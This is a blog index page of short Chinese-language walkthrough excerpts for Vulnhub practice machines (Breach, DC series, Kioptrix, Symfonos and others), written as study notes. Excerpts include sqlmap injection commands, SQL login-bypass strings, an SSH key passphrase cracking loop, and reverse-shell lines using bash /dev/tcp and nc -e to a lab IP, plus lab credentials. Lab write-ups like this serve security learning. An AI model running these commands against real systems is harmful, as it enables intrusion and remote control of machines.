![](https://img-blog.csdnimg.cn/20200519152019701.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
vulnhub
日常在Hack the box做练习题,在练习的过程中顺便对练习过程进行记录,当作是一本学习笔记,也希望能帮到更多的人!
菜浪马废
!
展开
-
Vulnhub靶机 Breach 1
开放了所有端口不应该啊看一下80网站源码注释有一段字符Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo解码pgibbons:damnitfeelgoodtobeaganggoodtobeaganggoodtobeagangta源码里有个地址用刚才得到的密码登录登录成功访问网站得到一个文件又一个文件和账号得到一个网站不能直接访问需要开burpsuitetomcat:T.原创 2020-09-29 19:21:44 · 214 阅读 · 0 评论 -
Vulnhub靶机 Troll3
只扫出了一个ssh枚举用户名吧不对不用枚举已经给出了账号密码了直接登录找到一个文件传输过来802.11无线网络的数据包对抓取到的cap包进行暴力破解切换账号lynx是命令行浏览器安装启动浏览网站又是一个账号继续切换genphlux:HF9nd0cR!ssh登录有了密码sudo -l查看提权成功...原创 2020-09-27 16:57:55 · 296 阅读 · 0 评论 -
Vulnhub靶机 Node
找到登录页面不能扫描啊抓包看看tom:spongebobmark:snowflake登陆了没啥用myP14ceAdm1nAcc0uNT:manchester登录成功下载文件转成zip文件但是需要密码找到密码mark:5AYRft73VtFpc84k登录成功提权成功这台vulnhub的node和htb的node是一样的我说做起来怎么有种似曾相识的感觉呢...原创 2020-09-27 13:47:26 · 272 阅读 · 0 评论 -
Vulnhub靶机 Symfonos 3
有shellshock漏洞验证一下上传pspy32扫到的进程下载文件wireshark进行分析得到账号密码登录成功修改脚本等待一会得到root权限原创 2020-09-26 17:13:56 · 417 阅读 · 0 评论 -
Vulnhub靶机 Symfonos 2
扫出用户名aeolusaeolus:sergioteamo用来登录ssh试试转发8080端口提权成功先是enum4linux找到用户名ftp爆破发现可以用来登录ssh找到运行的8080端口ssh端口转发访问后发现是cms找到漏洞得到下一个用户权限sudo -l找到mysqlgtfobins上找到提权方法得到root权限...原创 2020-09-25 18:33:00 · 396 阅读 · 0 评论 -
Vulnhub靶机 symfonos.local 1
得到了一个用户名和三个密码尝试登录helios:qwerty下载文件查看内容第一个Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) whi...原创 2020-09-25 16:31:17 · 187 阅读 · 0 评论 -
Vulnhub靶机 Healthcare
没有可利用的漏洞扫一下目录有注入漏洞sqlmap -u http://192.168.80.142/openemr//interface/login/validateUser.php?u= --dbssqlmap -u http://192.168.80.142/openemr//interface/login/validateUser.php?u= -D openemr --tablessqlmap -u http://192.168.80.142/openemr//interf.原创 2020-09-17 16:06:42 · 748 阅读 · 0 评论 -
Vulnhub靶机 Lazysysadmin
有wordpress访问shareadmin:TogieMYSQL12345^^wp获得低权限复制粘贴到404.php访问一个不存在的网址重新看一眼smb有密码看了一下别人的walkthrough连wp上传脚本都不用togie的ssh密码也是12345…...原创 2020-09-16 22:07:13 · 189 阅读 · 0 评论 -
Vulnhub靶机 FourAndSix1
挂载/shared里面有个.img文件挂载到/usb看见一堆图片原创 2020-09-16 15:59:39 · 173 阅读 · 0 评论 -
Vulnhub靶机 FourAndSix2
目标靶机ip:192.168.80.139开放nfs有一个压缩文件里面有id-rsa但是加密了得到密码:chocolate用户名:user还有一层验证cat /usr/share/wordlists/rockyou.txt | while read pass; do if ssh-keygen -c -C “user@forandsix” -P $pass -f id_rsa &>/dev/null; then echo $pass; break; fi; d.原创 2020-09-16 15:09:39 · 165 阅读 · 0 评论 -
Vulnhub靶机 hackfest2016 orcus
nmapAutomator.sh跑一下一堆端口80跑目录有个backups还有phpmyadmindbuser:dbpassword原创 2020-09-15 16:38:54 · 419 阅读 · 0 评论 -
Vulnhub靶机 Lord of the root
只开放了22端口searchsploit上没用可利用的漏洞连接一下提示要敲门for x in 1 2 3; do nmap -Pn --max-retries 0 -p $x 192.168.80.137; done原创 2020-09-15 14:36:17 · 321 阅读 · 0 评论 -
Vulnhub靶机 Tr0ll2
80什么也没找到ftp倒是登录成功了下载文件需要密码去看看之前看到的图片以为是密码结果是网页速度好快啊直接密码就出来了完了缓冲区溢出我不会啊我不会我不想做缓冲区溢出的题...原创 2020-06-09 16:30:27 · 574 阅读 · 0 评论 -
Vulnhub靶机 Digitalworld.local (Mercy v2)
i在这里插入图片描述敲门呗还可以内核提权原创 2020-05-04 13:49:33 · 451 阅读 · 0 评论 -
Vulnhub靶机 Digitalworld.local (JOY)
ftp可以任何人登录查看一下查看version_control文件看见:proftpd 1.3.5原创 2020-05-03 21:58:44 · 782 阅读 · 0 评论 -
Vulnhub靶机 development-improved
信息收集patrick可能是一个用户名html_pages貌似不能dirb扫描老是断开找到一个文件随便输入账号报错了原创 2020-05-03 20:18:37 · 417 阅读 · 0 评论 -
Vulnhub靶机 Toppo
找了半天没发现别的东西就一个密码看了walkthrough用户名就是ted两种方法内核我没看可不可以贴个网址非常好用传送门原创 2020-04-29 19:13:34 · 348 阅读 · 0 评论 -
Vulnhub靶机 Prime_Series_Level-1
换一个参数 secrettier360返回结果太多过滤一下???觉得自己被耍了这不是saket的密码我吐了是victor的我*****他的连接成功以为突破口是env最后还是内核提权我用的最后一个漏洞先在kali上编译 gcc -o poc 45010.c然后传到靶机上直接运行Vulnhub就打到这吧主要是还要下载太麻烦了...原创 2020-04-29 16:35:58 · 836 阅读 · 0 评论 -
Vulnhub靶机 W34KN3SS
应该没配置域名原创 2020-04-29 12:15:23 · 333 阅读 · 0 评论 -
Vulnhub靶机 bob
一个用户名bob一个提示:运行了webshell尝试id有回显抓包看一下/bin/nc 192.168.0.128 443 -e /bin/sh 给了个账号ssh登录爆破文件给了bob的账号原创 2020-04-28 20:21:12 · 250 阅读 · 0 评论 -
Vulnhub靶机 Lampiao
找到登录页面cms:drupal7可以爆破用户名先找一下漏洞试试伐克尝试了半天发现版本是7.54用了半天7.0-7.31的找到mysql的账号三个账号没能解密任何一个试一下ssh失败了root就在你眼前就是没法提权的感觉太酸爽了有一个用户tiagossh爆破我*********他密码是这个??????我*********$...原创 2020-04-28 12:25:34 · 545 阅读 · 0 评论 -
Vulnhub靶机 GoldenEye
80端口账号:Boris密码:InvincibleHack3r暗示我利用pop3将提到过的名字作为字典hydra爆破两个账户密码pop命令给了一个账号让配置/etc/hosts提到了一个名字doakhydra爆破有一个账号让我们登录刚才的网站一个文件地址还有adm1n cr3ds clear txt没处理直接打开...原创 2020-04-27 23:48:33 · 341 阅读 · 0 评论 -
Vulnhub靶机 scream
打开scream.exe选择winxp_pro_with_sp2.iso下载链接:ed2k://|file|sc_winxp_pro_with_sp2.iso|629227520|505B810E128351482AF8B83AC4D04FD2|/等待加载然后点击3的那个按钮生成一个.iso文件这个.iso文件就是靶机了然后去VM里新建虚拟机就可以了直接试试ssh搜索漏...原创 2020-04-27 15:26:29 · 930 阅读 · 1 评论 -
Vulnhub靶机 Lin.security
给了登录账号直接拿靶机登录第一种方法第二种方法原创 2020-04-27 09:48:32 · 247 阅读 · 0 评论 -
Vulnhub靶机 DC-7
最近太颓废了,没啥学习效率,多好的时间段啊,这疫情,这大假期,学学习考个证,他不香么插旗:10天弄完大佬推荐的所有靶机!加油!上来先用nmap扫一下nmap -sP 192.168.0.0/24nmap -sV 192.168.0.13380端口开着访问主页cms是Drupal好熟悉啊上一个也是这都是之前的啊感觉都类似不让爆破,在盒子之外什么鬼的footer处有D...原创 2020-03-31 09:47:29 · 337 阅读 · 0 评论 -
Vulnhub靶机 DC-5
先找到靶机然后扫一下nmap -sP 192.168.0.0/24nmap -sV 192.168.0.149发现底下的年份一直再变,怀疑文件包含漏洞写个phpinfo试一下返回phpinfo页面成功<?php phpinfo();?>监听端口nc建立连接nc -nlvp 4444/thankyou.php?file=/var/log/ngi...原创 2020-03-30 20:48:03 · 270 阅读 · 0 评论 -
Vulnhub靶机 DC-6
确定靶机192.168.0.141开放端口80,查看一下nmap -sP 192.168.0.0/24nmap -sV 192.168.0.141不能直接查看vim /etc/hosts 添加一下可以访问了,发现是wordpass,上wpscan找到了五个用户名,把五个用户名写进一个txt文件,当作用户名字典kali自带一个字典rockyou.txtwpscan --...原创 2020-03-30 20:13:24 · 317 阅读 · 0 评论 -
Vulnhub靶机 DC-4
信息收集`arp-scan -l 扫描本地nmap -sV 192.168.0.132 扫描靶机开放端口`开放80端口,访问一下页面是个登录页面,而且可以用爆破来登录,没有验证机制安装pydictor,一个字典生成工具,用它生成一个用户名字典 git clone --depth=1 --branch=master https://www.github.com/landgrey/p...原创 2020-03-23 12:48:35 · 405 阅读 · 0 评论 -
Vulnhub靶机 DC-1
查找靶机IP扫描本地,254是Kali,那138就是DC-1arp-scan -l对DC-1进行端口扫描发现开放80端口,进浏览器查看一下nmap -sV 192.168.0.138发现CMD是Drupal漏洞查找msfconsole 启动msfsearch drupal 查找drupal漏洞看到最新的是2019-02-20,但是等级是normal,还是用2018-...原创 2020-03-19 00:24:27 · 282 阅读 · 1 评论 -
Vulnhub靶机 SickOs1.2
没啥有用的东西只有一个test可以用put方式试了好几个端口4444 1180 1234都不行换了443可以了成功提权就用了一种方法这有个大佬,写的超级详细 传送门...原创 2020-04-25 15:14:38 · 229 阅读 · 0 评论 -
Vulnhub靶机 pwnos v2.0
先看一下80ports=$(nmap -p- --min-rate=1000 -sT -T4 10.10.10.100 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -sC -sV -p$ports -sT 10.10.10.100爆破网站目录找漏洞发现以上内容找漏洞运行脚本创...原创 2020-04-25 14:04:33 · 523 阅读 · 0 评论 -
Vulnhub靶机 it is october
靶机IP 192.168.0.150配置:NET之前一直配置不上IP的这有教程ports=$(nmap -p- --min-rate=1000 -sT -T4 192.168.0.107 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -sC -sV -p$ports -sT 192.168.0.107...原创 2020-04-24 16:12:17 · 731 阅读 · 0 评论 -
Vulnhub靶机 Fristileaks
按照作者提示要求设置虚拟机的MAC地址 08:00:27:A5:A6:76啥也没发现源码里有两个字符串解码第一个第二个给了用户名,猜测这是密码登录一下upload file又是文件上传wevely连接shell/home/eezeepz里的notes.txt文件有提示进入/home/adminfristigod的密码登录一下...原创 2020-04-16 19:18:41 · 243 阅读 · 0 评论 -
Vulnhub靶机 IMF
ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==flag2{aW1mYWRtaW5pc3RyYXRvcg==}imfadministratorroot直接找到了flag2进入contact界面拿到flag1解码 all the files rootflag2得到的字符串去点root访问一下得到登录页面可以猜解用户名...原创 2020-04-16 07:51:57 · 932 阅读 · 1 评论 -
Vulnhub靶机 PWNlab_init
找到靶机ip扫描到端口发现/config.phpLFI 学习链接https://blog.csdn.net/qq_29419013/article/details/81202358解码得到了一个数据库账号登录进去,看见三组账号(登录时加-D,不然不能登录)kent | Sld6WHVCSkpOeQ== JWzXuBJJNymike | U0lmZHNURW42S...原创 2020-04-15 16:24:41 · 1224 阅读 · 0 评论 -
Vulnhub靶机 MrRobot
arp-scan -lnmap -sV 192.168.0.143主页是这个样子的扫一下网站目录dirb http://192.168.0.143发现一个文件拿到了第一个key发现后台地址访问了一下那个文件拿到一个字典拿到的字典文件太大去重复化重新生成一个字典sort filename | uniq > filename登录后台主页找到...原创 2020-04-14 19:44:27 · 245 阅读 · 0 评论 -
Vulnhub靶机 Vuluix
发现25端口nmap -sP 192.168.0.0/24nmap -sV -A -O 192.168.0.136对smtp进行枚举apt-get install smtp-user-enumsmtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192....原创 2020-04-14 16:23:08 · 232 阅读 · 0 评论 -
Vulnhub靶机 Kioptrix 4
登录成功admin‘ or ’1‘=’1原创 2020-04-12 14:22:21 · 458 阅读 · 0 评论 -
Vulnhub靶机 kioptrix level 3
简介里说了先要配置hosts找靶机扫端口80 22登录界面LotusCMS搜漏洞searchsploit Lotus直接msf设置RHOSTS、URIsearch lotususe exploit/multi/http/lcms_php_execshow optionsset RHOSTS 192.168.0.128set URI /run...原创 2020-04-09 09:41:08 · 470 阅读 · 0 评论 -
Vulnhub靶机 Kioptrix: Level 2
找靶机,扫端口没有验证机制看的我都想暴力破解了万能密码试一下可以绕过admin‘ or ’1‘=’1抓包,这个样子命令执行192.168.0.128;bash -i >& /dev/tcp/192.168.0.128/4444 0>&1&nmap -lnvp 4444linux内核2.6.9...原创 2020-04-08 12:51:14 · 288 阅读 · 0 评论